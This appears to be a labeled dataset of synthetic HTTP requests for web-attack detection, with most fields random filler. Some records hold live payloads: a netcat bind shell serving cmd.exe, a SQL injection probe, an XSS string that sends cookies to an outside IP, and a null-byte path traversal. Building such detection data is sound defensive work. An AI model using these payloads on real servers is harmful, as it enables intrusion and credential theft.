If-Modified-Since: Thu, 20 Dec 07 23:26:07 GMT
If-Unmodified-Since: Mon, 17 Sep 07 20:18:08 GMT
If-Match: "vgeHfBZHPcV20D9pxUvR"
If-None-Match: *
If-Range: Fri, 10 Apr 09 06:47:51 CET
Max-Forwards: 8
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest nc=6d2CdE8f
Authorization: NTLM Zm9DY3hzY2Fucm5kYWhpbmVuY241c2V5Q3NhdGx5ZWVjbGk3aGE=
Range: 08099-8,3679-04437,185715-
Referer: http://Ls6rn.org/tlee/dgeoj/iHsi1yc/gelqihh0/thafiw.gif
TE: deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.1 (X11; U; Linux i586 7.8; ey-hi; rv:2.8.4) Gecko/69100663
UA-CPU: PowerPC
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3705x532
Via: 0.2 www.0eayo.gif
Transfer-Encoding: etra
Upgrade: jnTd/7.4, ORe/1.5, l6wE/2.8, caiM/9.8, pilwk/5.6
Warning: 835 51.125.168.202 "mbu7zlntbs2Lbdor" "Mon, 14 Feb 05 09:57:15 GMT"
X-Forwarded-For: 78.250.5.71
X-Serial-Number: 4431106659344342
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

d.MimgYITvGfu=3loNeUsceI&tCr8w=v83eW2hgnK&esb=tlibo%fi?Sdropc'+&WjZYBn=5&STetr=bdoeSr0ebbuew8bi&sxut=6860776&rtotshtxt=17108698&7Uwste=i_0&fhywuTohstel=i>saunil2w/e&ZSXstdinhKRlTidAe=l9htnnCjda

End - Id: 50051
Start - Id: 42802
class: OsCommanding
GET /56luyhhtseosrle/insert2oidoptWr_exec/sYX3TlBIRq/VmasvdHyme/eZHU/0caYjca0ur6lHZ0.Hu.gif?csrhmaer7r=or&tEatamG6=vrsad&esg8e6c1yhehR=union&wp4ahneensr=00&vvpd5gi6Xteot=aeelleDuhlast&nxW9boeC=e%3Aa&e4fe=E%3AZt%27etgb%2Ffqy&dgi6he=euq+%40%25psam%3Afmfrle&uems1soe=ediebtht4EaryianIc&huO4sxns4hii=1am&DUXjb.EI=s%5Dicn9eOl%25%27brn&yhr7tTdtvri=wSo8i8cr&shsoItfcehq=9yh HTTP/1.0
Host: www.iygrtntld.de
Connection: a6ltnck
Accept: image/gif, video/*;q=0.0, video/*;q=0.1
Accept-Charset: iso-2022-jp
Accept-Encoding: *
Accept-Language: 12.27.125.44  |  dir
Cache-Control: max-stale
Cookie2: $Version="869"
Date: Thu, 03 Jun 04 16:15:59 CET
ETag: "NPJV0U7C3eXIWfmDdtDy"
If-Unmodified-Since: Tue, 24 Mar 09 05:33:20 UTC
If-Match: "SnooOTCXE3NMz@_f"
If-None-Match: "Ghzz_Aw5p0pEDjS13"
If-Range: Sun, 07 Dec 08 22:30:55 GMT
Max-Forwards: 18
Proxy-Authorization: Basic MHo0bnM6UmZTbg==
Authorization: NTLM bXNub25laWFoaDF0MXhTZDU3cm50bXNydzJudXE1cWRlZW5hZWVz
Referer: http://pmk7nnb.be/ts0uegt/mtetsaee.conf
TE: chunked;q=0.0,trailers
Trailer: User-Agent
User-Agent: Mozilla/0.5 (Machintosh; U; Mac OS X 6.0; ge-b4; rv:1.0.1) Gecko/51042276
UA-Disp: 017,6787,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4444x6444
Via: 4.4 213.130.0.148
Transfer-Encoding: iSty
Warning: 125 4.115.200.34:8 "aapi" 

null

End - Id: 42802
Start - Id: 2631
class: Valid
GET /sJQPgQbLl8Mv/EDOYfonullFS/s1/6rjwpealeeo/pecFm2CqmXq/yJ@H/-dnprocessing-instructionRObgsound/e79w/iPv/oljsfto/xvAyP2NQ2gC4tpYJ/tPsmnPyXLh1o.bin?ghIeowaeogiord=16 HTTP/1.1
Host: 74.56.107.253:010
Connection: hnh7Dt
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 20.154.59.202
Cookie: td2eeogltax=oqGA
Cookie2: $Version="224"
Date: Wed, 28 Jul 04 18:25:47 GMT
ETag: "Q-eSxUs2supfHmruUeEP"
Expect: eete=ebyt;egeE
From: hcqlau@ypyesaoel.fr
If-Modified-Since: Sun, 31 Oct 04 17:54:05 CET
If-Unmodified-Since: Sun, 16 May 04 13:23:30 CET
If-Match: *
If-None-Match: "7XdiUUl53MhH6-Stx"
If-Range: *
Max-Forwards: 5
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.noelxt.uk/uceliu/partes/cnIjab.mdb
Authorization: NTLM V3p0aGpjc0x5YWVzbGR2ZWU3aWVjdHJ0b25ybmNEeXRuZ25hdHlwY3RQcA==
Range: 720674-61516,-25,7612-
Referer: http://www.rrIEIk.uk/asieue/gEtwnE/ie2acP/t93twrto/eeaw6de5.txt
TE: trailers,gzip;q=0.2
Trailer: Pragma
User-Agent: mage80cma/4.3
UA-CPU: 68000
UA-Disp: 409,1827,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 907x1790
Via: FTP/4.3 130.65.198.51:00, gCe/5.2 www.giHdma.js, 5.4 91.184.137.25
Transfer-Encoding: identity
Upgrade: byS/1.8, RdEme/2.6, m61N/2.9, doa2/8.0, ntsehr/4.6
Warning: 388 www.Fet6pwu.shtml "nteouIii" 
X-Forwarded-For: 231.234.57.54
X-Serial-Number: 93836
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2631
Start - Id: 41697
class: SqlInjection
GET /rU3H/ihleaenhWnfto/yE/hhiranptrnimr9rHy/Rvpssam/14x1bw/dM98ZJBhc/nvAeFEQRG/aX.mdb?dessoht=6497814&rRueMve=087&cgn=cmanoS&oHlena=%3A&oXnVR=4&q5=micmdd&ueGeoet=cLXALo5TtdR&qNltto1gcoreD=%27++group++++by++++users.id+++++having+++++93974%3D93974&nmpdrP=teihbUVit0tcue HTTP/1.1
Host: 195.201.163.55:80
Connection: u4tatLx1
Accept: image/jpeg;q=0.5, image/png;q=0.2, text/html
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: apetu-b, trh-6t;q=0.6
Cache-Control: no-store
Client-ip: 51.187.24.113
Cookie: hr=soeuoEyen;edimeTs=vbscriptuO
Cookie2: $Version="017"
Date: Thu, 14 Sep 06 06:08:30 UTC
ETag: "ms1MadMBVHvYr8Op"
Expect: nllry
From: ube8gesO@rdptemmi.st
If-Modified-Since: Sun, 09 Jul 06 02:54:29 CET
If-Unmodified-Since: Sun, 15 Oct 06 13:26:38 UTC
If-Match: *
If-None-Match: "EFoNLokJfKIDxx8stt"
If-Range: Wed, 01 Jun 05 13:30:32 CET
Max-Forwards: 5114
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic QXNlbzBuNVM6ZWVyZWJrdHk=
Range: 271923-
Referer: /tstohu2i/Tsazoz/i6itu/snni.mpg
TE: gzip
Trailer: Accept-Language
User-Agent: Mozilla/1.8 (Machintosh; U; PPC Mac OS X 5.8; Uu-Is; rv:8.2.4) Gecko/78044982
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 128x875
Via: tce/7.4 170.99.27.27, 7.3 www.eOIioun.png, fnleea/4.2 www.paesu.html
Transfer-Encoding: slee6
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 137 173.7.112.18 "mIt3it3cidet" "Sun, 16 Sep 07 01:52:40 GMT"
X-Forwarded-For: 200.2.71.249
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41697
Start - Id: 4581
class: Valid
POST /eg125Eux/oALoH85J_9i-b_/st6ot/e3BupGS7nxf7/nVYmnJRiKLAtsz6Pw/itOcC._.pl? HTTP/1.1
Content-Length: 143
Content-Language: a,s
Content-Encoding: identity
Content-Location: /Saoy7o/emoatp9/pehz/tNlxai.tar
Content-MD5: ZWNoOHNzZElIeXhyb29uaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 Sep 05 01:40:53 CET
Last-Modified: Sun, 29 Apr 07 18:35:34 CET
Host: www.hlaApiutUn.gov:8
Connection: jlhiaesb
Accept: */*
Accept-Charset: x-mac-chinesetrad, windows-1252;q=0.2, utf-7
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-age=8446
Client-ip: 241.23.128.126
Cookie: xwdeytaitn7Tr=4103356
Cookie2: $Version="006"
Date: Sun, 23 Jul 06 04:08:30 CET
ETag: W/"vuwqQYwLICNtYcw6B@4"
Expect: Ioowfsh=eukgain6
From: a5wn@h3Rit.be
If-Modified-Since: Sat, 09 Oct 04 24:53:39 GMT
If-Unmodified-Since: Sat, 12 Nov 05 01:21:19 CET
If-Match: "Ldan5XskSURV@GJ.e_"
If-None-Match: "k1Flc4yLGMgJmo4Y0y"
If-Range: Fri, 04 Mar 05 07:21:16 CET
Max-Forwards: 38
MIME-Version: 6.2
Pragma: dt5nbwt='omat0k'
Proxy-Authorization: qkktsv 2oai=91eto
Authorization: taps elnih=oajRi
Range: -6763
Referer: http://srF4o.fr/An3aOn/u5benhr/asogi.html
TE: trailers,deflate;q=0.5,trailers
Trailer: Host
User-Agent: Mozilla/1.9 (X11; U; Open BSD i586 5.6; ic-nn; rv:4.4.4) Gecko/70738159
UA-CPU: StrongARM
UA-Disp: 067,349,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1436x3813
Via: 5.5 www.secztCr.gif, 8.5 236.198.68.109
Transfer-Encoding: gzip
Upgrade: y3ba/9.8
Warning: 520 www.1weN3tt.js "tnnre9haoghuxhIda3e" "Fri, 07 May 04 09:34:48 CET"
X-Forwarded-For: 210.240.131.9
X-Serial-Number: 09527
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

sslssU3ars4pc=yshttps p&iZ8rm8h=69642&Psaeav=1&wdytih= to4=r[&t7tooeii3aw=4111&netcat3CO=5&LcVA=haeseeE8sslud&G3deN-Qwherel=4848&nwl=887115

End - Id: 4581
Start - Id: 18887
class: Valid
GET /tec3eroa5/2ZGms/aeethd3/grtndiu/oO0JCq72/rXiCLD8EcM0DizTvp/dZPK8T9YHf1r.jR/a6LKeR/ifZr51PAIU.msf?clqacbditmeebls=902657&teLe9e=8717786&iidsisi0Ao7=05 HTTP/1.0
Host: www.jo6ndek.it
Connection: keep-alive
Accept: text/xml;q=0.9, audio/basic;q=0.9
Accept-Charset: gb2312, windows-1258;q=0.4, euc-tw, x-mac-roman;q=0.5, isiri-3342
Accept-Encoding: identity;q=0.9, compress, compress, gzip, identity
Accept-Language: *
Cache-Control: max-age=56
Client-ip: 234.213.186.59
Cookie: Otzlyrnc2S=same;Sv5Suapa=ikhP4;cUtsZhJahS=spaydio(cn
Cookie2: $Version="7"
Date: Fri, 01 Jun 07 23:47:28 UTC
ETag: "d0gxc9lfL-sJkju"
Expect: ttfdjerd
From: HiPzZ@7ede4.st
If-Modified-Since: Sat, 07 Feb 09 16:50:31 CET
If-Unmodified-Since: Wed, 13 May 09 18:09:01 CET
If-Match: "4ziNm-VLj4IzYeW_MaKw"
If-None-Match: *
If-Range: "fNUcz6ns-md0plYAp5"
Max-Forwards: 9
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: 6taTi iwvegna=rte6ucf
Range: -47,36391-88404,16-
Referer: /besrnctl/wnc3pw/nsOa/Hooe.jsp
TE: gzip
Trailer: Cache-Control
User-Agent: Mozilla/5.6 (Machintosh; U; Mac OS X 5.5; la-rn; rv:3.6.3) Gecko/22828062
UA-CPU: StrongARM
UA-Disp: 708,1125,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 592x5506
Via: 9.2 www.adyeOnS.gif, FTP/8.7 10.218.222.45, 4.4 158.59.58.70
Transfer-Encoding: deflate
Upgrade: nash0s/1.5, Xiiie/7.6
Warning: 515 www.thiaMal.shtml "s50npgca2ainent" 
X-Forwarded-For: 56.146.49.3
X-Serial-Number: 47230032
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18887
Start - Id: 33641
class: Valid
PUT /yGPc/9Y02zFf7Dall/uIisesN/9ebIalecrrOiRmft6/tmihahpatherirnxibxv/myAesin31ea/mLtr6Z2dFMTc/ma75L/fheaBpedqstWanla/oows/c@Ab_ZKRcBeC.shtml? HTTP/1.1
Content-Length: 49
Content-Language: tn3,ovoo,srneik
Content-Encoding: gzip
Content-Location: /geti/toi8e.ace
Content-MD5: ZXRtamV0bnRtc3RlbHl2dA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 26 Nov 04 21:48:09 GMT
Last-Modified: Sun, 30 Nov 08 22:32:55 GMT
Host: 143.116.49.223:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.0, deflate, gzip;q=0.4, deflate;q=0.0, deflate;q=0.5
Accept-Language: *
Cache-Control: min-fresh=06
Client-ip: 20.192.251.72
Cookie: Sl=dfsicx3thaeoFqh'iaah;2leipxEr=5axDth1window.opennpiiar;utto4emrzAas=LN;rerVl=83967;iea=vnunion
Cookie2: $Version="073"
Date: Thu, 16 Sep 04 02:46:32 GMT
ETag: "kmSUcPJ2-I1qWCt"
Expect: 100-continue
From: sncf@ebngie1ui.fr
If-Modified-Since: Fri, 27 Jun 08 15:36:31 GMT
If-Unmodified-Since: Fri, 21 Sep 07 23:07:13 GMT
If-Match: "SktJIwreag-TW3Nl82H5"
If-None-Match: *
If-Range: Sun, 19 Nov 06 04:46:06 GMT
Max-Forwards: 286
MIME-Version: 8.9
Pragma: a=di
Proxy-Authorization: Basic c242bzp1aHNydHV5
Authorization: Basic aGJuaW86ZmVkZWFkOWQ=
Range: 585-81
Referer: /7cpdnh/cyepm/eswj/htlooe/1dDil5nw.jpg
TE: chunked
Trailer: If-Match
User-Agent: Mozilla/9.1 (X11; U; Solaris 9.7; tu-fn; rv:4.6.9) Gecko/04911534
UA-CPU: PowerPC
UA-Disp: 6340,3688,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 298x670
Via: 7.2 www.aeeeus.jpeg
Transfer-Encoding: compress
Upgrade: gtna/7.9, sn70/6.7
Warning: 498 www.xaotiar.jpg "eukeq6fnna" 
X-Forwarded-For: 246.11.40.158
X-Serial-Number: 310133590231890475
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

THudfQiQX=2hinnunhttph77ivxMT&Aerrjaecorssod=TdIm

End - Id: 33641
Start - Id: 20965
class: Valid
GET /0ooSsia/e0mpy-ME73tX/werrl1hneem/tpsgYC12SbN/uLjV1pwRi7-hKgIZ2.htm?la=76 HTTP/1.0
Host: 251.31.199.4
Connection: ihe2rt
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: e6jey-euiG
Cache-Control: no-transform
Client-ip: 8.17.126.237
Cookie: evhehhatslef=87451014;Dp2Tiaxcc=64949468;ip-XNuANDE=3303114390
Cookie2: $Version="77"
Date: Mon, 30 Jul 07 02:33:41 GMT
ETag: W/".h4X9.4Pi3kK62MD6-Y"
Expect: yhhsseB=toxiEqex
From: stnsist@ee8nh.de
If-Modified-Since: Sat, 23 Feb 08 12:46:23 GMT
If-Unmodified-Since: Wed, 26 Jul 06 05:25:30 CET
If-Match: "SRW0BdiOSFyaWhSxmq1"
If-None-Match: "Kp5wEQ0HrtGx-1lnoAF"
If-Range: *
Max-Forwards: 35
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest uri=http://trntegwe.gov/aaae/hicet/u5e6b.aspx
Authorization: Digest cnonce="rr0s7e"
Range: 225798-,299422-
Referer: /2tata9go/dweolks1/eorvrbO/yxrnrmp.php4
TE: trailers,chunked;q=0.3
Trailer: Authorization
User-Agent: Mozilla/7.3 (Windows; U; Win98 9.4; je-ti; rv:3.7.6) Gecko/63037282
UA-CPU: 68000
UA-Disp: 3276,4561,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 212x4647
Via: 6.6 www.coui.css, 2.0 www.neoyh.html:54
Transfer-Encoding: compress
Upgrade: tknsdI/6.1, bao9sk/7.3, wfso/2.7, lrm/1.0
Warning: 818 39.101.24.238 "Ei4etc3nfbsi2nwj" 
X-Forwarded-For: 251.229.233.197
X-Serial-Number: 175416
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20965
Start - Id: 20036
class: Valid
GET /MetahRr/mai1sH84Frp1G/R36qslmmbn/t2ne9nanks/aFhhrMrcik/9VNPSvaG1/hiosNreiu1rsRlurs/nenaaipeqrubd/brn88is8e8oefEnon/ea9ncGjtSopiosfs/srwsoa9h/sbcjUrM6ceUbfoNmwaH2.htm?deuueita=468&KtFwget=-+mo1o&Aq=dIhldheosrstdrrda&ow=0621771135&aRq=hl%26fs2myid6&a9snlered7=eipositiono+&qae8cyl=e%26a4nwinntd9i7u+u%29xb+%28Se&AJ-KQs=55029951&jotdxmnteqbos=sextneEaiaaopt0&Sbnsryxtc=an&htaccesCFs=abh42Rk6 HTTP/1.0
Host: 98.92.169.216
Connection: close
Accept: video/mpeg, image/*, video/mpeg;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: mxo-AbDcL;q=0.8, rey1ma-dg;q=0.2, efie-mnm;q=0.5, maxnR-l7Wnm;q=0.1
Cache-Control: max-stale=2749
Client-ip: 193.232.37.177
Cookie: etwcnsg7knOSs=4059926266;Incyec2ti4=sCjPH7I;srshgiooo=86993436
Cookie2: $Version="58"
Date: Thu, 18 Feb 10 12:42:16 GMT
ETag: "qkJKfFJ1@L_adVwF"
Expect: eSdnipi
From: npvz8ts@megrcNfoe.biz
If-Modified-Since: Tue, 15 Sep 09 11:27:42 GMT
If-Unmodified-Since: Wed, 13 Feb 08 02:04:15 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 05 Sep 04 05:17:49 GMT
Max-Forwards: 256
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic ZWRlbDphbjJuZWVlaQ==
Authorization: NTLM d3NuY3NoMG5KSGE3ZHJ0aG5vcm5uemFucnRlb2Vnc1pleWJkbnBu
Range: 27057-33833
Referer: /dmttpch/atmtafw/tru1.wmn
TE: deflate;q=0.8
Trailer: Upgrade
User-Agent: fEpMPejvre/1.1.5.7
UA-CPU: PowerPC
UA-Disp: 6419,466,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6883x9445
Via: FTP/5.1 www.cajhg.js, 7.9 www.1bT0f.js
Transfer-Encoding: compress
Upgrade: bdhepu/8.1, Vgioj/9.0, cn4dd/3.3, obt/7.0
Warning: 730 107.229.95.139 "66sndnecnvsHlT7t" 
X-Forwarded-For: 99.9.48.167
X-Serial-Number: 6458624445649
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20036
Start - Id: 42856
class: OsCommanding
GET /s4WyXFz6gVxW/W6Qpyv.kqVr/Imcesr.gif?co0lcQ6=Eneemze66gtiIe&JphpIe.null4Yxetc=onU5moedonnh&r0s33KZ7qYAv=%24lw&Eoyhopt=pbiosAitosrtlleaie&sxO=%7C+shell%28++++%22cmd+++%2Fc+c%3AInetpubwwwrootMSISSnc.exe+++-l++-p++++3598+-t+++++-e+++++cmd.exe+++++%22++%29++%7C++%27&sm=rttyhu3lctrr1issp HTTP/1.1
Host: www.l3ke.cz
Connection: close
Accept: image/*
Accept-Charset: macintosh, windows-1252, euc-cn, x-mac-cyrillic;q=0.6, windows-1255
Accept-Encoding: deflate;q=0.4
Accept-Language: o-pzp2eEi, eenk-icracgg;q=0.6
Cache-Control: only-if-cached
Client-ip: 220.191.86.68
Cookie: DlAt6eps=A7odV9|bntnsde
Cookie2: $Version="0"
Date: Wed, 08 Dec 04 04:18:32 UTC
ETag: W/"ZiI.zDqECREct5pE.gN"
Expect: ecdm
From: l6tz5hd@ruglhe.be
If-Modified-Since: Wed, 22 Oct 08 08:12:22 CET
If-Unmodified-Since: Thu, 08 Mar 07 08:42:11 UTC
If-Match: *
If-None-Match: "TvWaN9S.m2Nw5gLALYQ8"
If-Range: Sun, 24 Oct 04 14:12:12 CET
Max-Forwards: 584
MIME-Version: 4.3
Pragma: CwSE=hnhos4cC
Proxy-Authorization: njdei gtdN=st7gs
Authorization: Basic bm9kZGRzc2c6b2FiYkY=
Range: -865928
Referer: http://www.jloqeitl.de/cNavrsc/fymr/GuiM6e2m/sgolu.mdb
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/1.0 (compatible; MSIE 4.8; Open BSD i386; rhinbH)
UA-CPU: MIPS
UA-Disp: 0286,0560,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 625x3364
Via: HTTP/7.7 www.erkth.tiff, 5.4 www.monrr.css, FTP/7.5 148.61.28.128
Transfer-Encoding: r82m
Upgrade: gds/3.0, ehewef/0.6, eator/3.4, mwnet/5.2, hnta/0.2
Warning: 322 www.3aaua.png "dnycjwts1Uhnsohdc" 
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42856
Start - Id: 25929
class: Valid
GET /fPr74SWpqijHW6/Mncb74rmN/ceedimTna9rpUE.php3?9e=iEyGwA7.Y5zq&orMiS=sMb&dIlLwp-gtmp=806453&let4oO=gZneS&i5owBao=9ND&7do0LhOb=t6sam&eeaaR=25&AeserrdDos=iptlikee&0dslton=beswnutidki&X0YCACB=3326939&r0bpjarl8sooAhe=4592883294&ud=449837&xhavingb9C5iJ=sO-iW-yx3vp&taStwa=hke&tnNentb=nrmen HTTP/1.0
Host: www.EEizmv.com
Connection: 4rsij
Accept: video/mpeg;q=0.1
Accept-Charset: x-mac-icelandic;q=0.2, windows-1253, windows-1252, x-mac-icelandic;q=0.6, shift_jis;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 151.64.233.90
Cookie: hwtFNeril3ts6=ulzaoalcete;rjeEl=UlrabdmIinnrwqcm;hhesonat=04Avoeteuehdblsdog
Cookie2: $Version="6"
Date: Thu, 05 Apr 07 15:26:20 GMT
ETag: "ZrLxJWW4Lfsbyxp1kd"
Expect: liatar=9ett
From: pOyls@mejt.gov
If-Modified-Since: Mon, 01 Jan 07 20:27:01 UTC
If-Unmodified-Since: Wed, 27 Jun 07 10:39:21 UTC
If-Match: *
If-None-Match: "3wtyaVFrABLiNhi"
If-Range: Tue, 02 Jan 07 01:20:09 CET
Max-Forwards: 7300
MIME-Version: 7.8
Pragma: s='hrsrul'
Proxy-Authorization: Basic cm1lYTpvZWVoQQ==
Authorization: ahtwme 2fda=jhaaQ
Range: -1909,0060-494,6-
Referer: http://ntanl.de/0gs8eH7.mp3
TE: trailers,trailers,chunked
Trailer: Host
User-Agent: Mozilla/1.9 (compatible; MSIE 9.0; Win 9x; tfjNsy; et7hr)
UA-CPU: StrongARM
UA-Disp: 9734,8535,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 5187x1770
Via: ematm/1.1 18.59.177.51, FTP/6.3 126.78.214.71
Transfer-Encoding: deflate
Upgrade: L5mEt/8.6, onmhis/9.1, yacc0v/3.3
Warning: 600 www.rong.jpeg "ecdetwej" "Mon, 19 May 08 07:00:07 UTC"
X-Forwarded-For: 177.96.24.239
X-Serial-Number: 1807971586692
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 25929
Start - Id: 29066
class: Valid
GET /0Bizz-GN6MPyi3JwAL/etwtEtsu/WrtCruloedt/tOidgp6oac/yW0kzCaEovBdCAjUrY2/a204Dvgt/siuzstkohEaj/openzSu.gif?QerTzelea=lnjptrTwc&O0hfEwj-E.=3617&ft=sitQr%40&osmrnd=05996&iytHwv=Idiref8l8s8&etqop=av. HTTP/1.0
Host: 211.201.182.106
Connection: fxia
Accept: text/*;q=0.8, video/quicktime;q=0.1, text/xml;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: mpmm-9i9m;q=0.2
Cache-Control: min-fresh=2
Client-ip: 144.134.39.207
Cookie: asliesnb=r3dgpNs;8e6ytddaseih7oe=ap
Cookie2: $Version="36"
Date: Fri, 23 May 08 17:20:10 GMT
ETag: "znuW.eAT.4Wbvxp"
Expect: 100-continue
From: te6nde@Ieee0ntr7.net
If-Modified-Since: Sat, 30 Jan 10 19:43:02 CET
If-Unmodified-Since: Thu, 22 Jan 09 24:01:28 GMT
If-Match: "0qNLhGwOcQqeAcy"
If-None-Match: *
If-Range: *
Max-Forwards: 7651
MIME-Version: 6.5
Pragma: ri='ntsiindn'
Proxy-Authorization: gssa mdooRR=usOT
Authorization: Basic bHRvaG84OnRhaGN1aQ==
Range: 2-728395,2-644,-332
Referer: http://www.r5Een3yd.org/atkjcie/lfyh3en/meoedbl/oeiol/rdPehE.jsp
TE: trailers,deflate;q=0.5,trailers
Trailer: Warning
User-Agent: Mozilla/5.2 (X11; U; Open BSD i386 7.5; si-ha; rv:2.4.3) Gecko/42808887
UA-CPU: x86
UA-Disp: 6073,149,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 890x9958
Via: HTTP/0.4 www.bttaL.htm:0965, HTTP/9.3 www.swlmn.css
Transfer-Encoding: gzip
Upgrade: Ymaeea/2.1, onqsd/4.3
Warning: 278 www.tcotssn.tiff "t1rotxxS" "Thu, 11 Nov 04 16:16:21 UTC"
X-Forwarded-For: 251.84.212.195
X-Serial-Number: 1881707
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 29066
Start - Id: 48110
class: XSS
GET /nodmaoabiratoE/tdTIb/e-5Izzn@skL6vDS.css?jWDinCrkRVX=ylhzctesmi&Ievng=39387662&uBelptpNl4ea7a=%3Cdiv++style+%3D%22+++++background-image%3A++++url%28javascript%3A+%5Bwindow.open%28%27http%3A%2F%2F237.24.206.184%2Forinra.aspx%27%2Bdocument.cookie%29%3B%5D%29%3B++++%22+%3E&Trelrfdn=sIGvdx6r8&keriipb=dBEI5hv HTTP/1.1
Host: 58.80.198.29:5897
Connection: 3R94wnec
Accept: image/png, audio/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e16dSrh-Ot3l, pm-F;q=0.0, ws-zut, eG-z
Cache-Control: es9=ttjneg8
Client-ip: 182.252.28.208
Cookie: aelbotc8w=859163962;MmyWsasrh=H6netuo3tswte
Cookie2: $Version="832"
Date: Tue, 13 May 08 24:13:55 CET
ETag: W/"RfXA@5bMcOaWURhyi"
Expect: 100-continue
From: bnwioIhh@fnmcaAYfe6.de
If-Modified-Since: Fri, 27 Feb 04 15:56:49 CET
If-Unmodified-Since: Wed, 06 May 09 05:49:14 GMT
If-Match: "xPb8iK-qdGXF1uL@"
If-None-Match: *
If-Range: *
Max-Forwards: 5211
MIME-Version: 3.4
Pragma: s=itinahE
Proxy-Authorization: Digest realm
Authorization: ehtw2 teSjse=oaotilii
Range: 223086-98
Referer: /oe9nei/atwjc5/edahu.avi
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.9 (Windows; U; WinNT 8.3; 8a-th; rv:3.9.8) Gecko/97487180
UA-CPU: StrongARM
UA-Disp: 367,260,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6001x2247
Via: itc/9.4 www.tnaee3a.gif, ihxe/1.2 22.35.3.209:4, 0.4 186.28.142.209
Transfer-Encoding: deflate
Upgrade: k6wua/1.5, metwv/8.5, seYsb/7.3, xm2ufg/8.4
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 69.186.228.89
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48110
Start - Id: 44834
class: PathTransversal
GET /ngtw/ld6aicrtsscne/l7_BP@gLfx8kS1x/8keteh6dxekuEtnr/ciclr/nOa@JcERf4Fr-acX/mXGef2wp7FIb@feBzVy.jpg?TE_EeGggCqmI=..%2F..%2FUBData%2FMembers%2Fmembers.grp%2500&yqsroo2eszeidrm=katuii7Ri&etpsI2=f&Antluft=titTeoI14n%5Dbn&foieL=dH5eeia&gedwnazesf=187622&rhm0t=e99afgt4epnole&ndhs2=mlo HTTP/1.0
Host: www.ehriml.st:80
Connection: i3Rsfm
Accept: video/*;q=0.5, text/xml, audio/basic
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.8, gzip;q=0.3
Accept-Language: e9ezi-4sjdaD0t
Cache-Control: min-fresh=91280
Client-ip: 203.89.41.237
Cookie: id=0t?aSy2akv3m;Efhnnc3hhe=59921497;Grtgtarj=nyoolocation;es=okG;aEszb=l:httve
Cookie2: $Version="4"
Date: Tue, 06 Feb 07 18:14:03 UTC
ETag: W/"1jGtoTUskEbXDpBL"
Expect: 100-continue
From: eosehi@IsoiaSe.uk
If-Modified-Since: Sun, 07 Jun 09 04:15:13 CET
If-Unmodified-Since: Sat, 25 Nov 06 19:15:51 UTC
If-Match: "uJ31EpmYT1pAKGjGgaY3"
If-None-Match: "dm1.5SkSSW-U3VQjV5wY"
If-Range: "AwNEyj99C2j5zSWS"
Max-Forwards: 7713
MIME-Version: 3.1
Pragma: tH2SVneO='ohas'
Proxy-Authorization: NTLM cnRhZ25sYWlscmNrMzQweWRwdG9jYW9zZWx0cGVubXZp
Authorization: Digest opaque="hpOo"
